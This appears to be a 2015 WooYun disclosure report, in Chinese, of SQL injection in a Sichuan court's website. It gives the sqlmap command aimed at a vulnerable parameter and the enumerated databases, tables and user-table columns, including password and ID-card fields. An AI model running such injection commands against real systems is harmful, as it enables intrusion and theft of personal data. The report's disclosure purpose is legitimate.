当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139500

漏洞标题:四川广安市中级人民法院SQL注射

相关厂商:四川广安市中级人民法院

漏洞作者: 冷白开。

提交时间:2015-09-09 14:13

修复时间:2015-10-26 13:54

公开时间:2015-10-26 13:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

四川广安市中级人民法院SQL注射

详细说明:

注射命令

sqlmap.py -u "http://**.**.**.**/news_videos.jsp?classId=0207" --dbs

1.png

脱点数据证明问题存在

available databases [12]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] ermyyla
[*] gacourt
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] webdb_gazycpws
[*] webdb_gazyww
Database: gacourt
[76 tables]
+--------------------------+
| MAILTYPE |
| MAILTYPE |
| MAILTYPE_SMALL |
| MAILTYPE_SMALL |
| SZXX |
| SZXX |
| SZXX_ACCEPTED |
| SZXX_ACCEPTED |
| T_HRS_DEPARTMENT |
| T_HRS_DEPARTMENT |
| T_HRS_ORGANIZATION |
| T_HRS_ORGANIZATION |
| T_MESSAGE |
| T_MESSAGE |
| T_SYSEIP_MENU |
| T_SYSEIP_MENU |
| T_SYSEIP_PERMISSION |
| T_SYSEIP_PERMISSION |
| T_SYSEIP_ROLE_PERMISSION |
| T_SYSEIP_ROLE_PERMISSION |
| T_SYS_LOG_LOGIN |
| T_SYS_LOG_LOGIN |
| T_SYS_LOG_OPER |
| T_SYS_LOG_OPER |
| T_SYS_ROLE |
| T_SYS_ROLE |
| T_SYS_USER |
| T_SYS_USER |
| T_SYS_USER_ROLE |
| T_SYS_USER_ROLE |
| UCOMMENT |
| UCOMMENT |
| UCOMMENTUSER |
| UCOMMENTUSER |
| UCOMMENTVIEW |
| UCOMMENTVIEW |
| UENTERPRISEMENU |
| UENTERPRISEMENU |
| UFIRSTMENU |
| UFIRSTMENU |
| ULETTER_PURPOSE |
| ULETTER_PURPOSE |
| ULINK |
| ULINK |
| ULINKVIEW |
| ULINKVIEW |
| UMESSAGE |
| UMESSAGE |
| UNEWS |
| UNEWS |
| UNEWSADDUCTION |
| UNEWSADDUCTION |
| UNEWSVIEW |
| UNEWSVIEW |
| UOPINFO |
| UOPINFO |
| UPARAMETER |
| UPARAMETER |
| USECONDMENU |
| USECONDMENU |
| UUNIT |
| UUNIT |
| UUSER |
| UUSER |
| UUSERVIEW |
| UUSERVIEW |
| V_SZXX_DEAL |
| V_SZXX_DEAL |
| gacourtatt |
| gacourtatt |
| log |
| log |
| portaluser |
| portaluser |
| sqlmapoutput |
| sqlmapoutput |
+--------------------------+
Database: gacourt
Table: UUSER
[44 columns]
+--------------------+---------+
| Column | Type |
+--------------------+---------+
| ADDRESS | varchar |
| ADDRIGHTS | varchar |
| ADDRIGHTS1 | varchar |
| AUDITINGRIGHTS | varchar |
| BROWSERIGHTS | varchar |
| DELRIGHTS | varchar |
| DELRIGHTS1 | varchar |
| EDITRIGHTS | varchar |
| EDITRIGHTS1 | varchar |
| EMAIL | varchar |
| ENTERPRISERIGHTS | varchar |
| IDCARD | varchar |
| IDS | varchar |
| INHERITRIGHTS | numeric |
| ISMANAGER | numeric |
| ISONLINE | int |
| ISSUERIGHTS | varchar |
| LOGIN | varchar |
| MSN | varchar |
| NAME | varchar |
| OPEN_LOGIN | varchar |
| OPEN_PWD | varchar |
| PHOTO | varchar |
| PIC | varchar |
| POSTCODE | varchar |
| PWD | varchar |
| QQ | varchar |
| REGTIME | varchar |
| REMARK | varchar |
| RIGHTS | varchar |
| sendbackrights | varchar |
| SEX | varchar |
| STATE | numeric |
| TEL | varchar |
| UNITNO | varchar |
| USERNO | numeric |
| USERNO_BAK | float |
| WELCOME | varchar |
| YCYWADDRIGHTS | varchar |
| YCYWAUDITINGRIGHTS | varchar |
| YCYWBROWSERIGHTS | varchar |
| YCYWDELRIGHTS | varchar |
| YCYWEDITRIGHTS | varchar |
| YCYWRIGHTS | varchar |
+--------------------+---------+

至于密码。。。解密不出啊。。。。

2.png

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-11 13:52

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无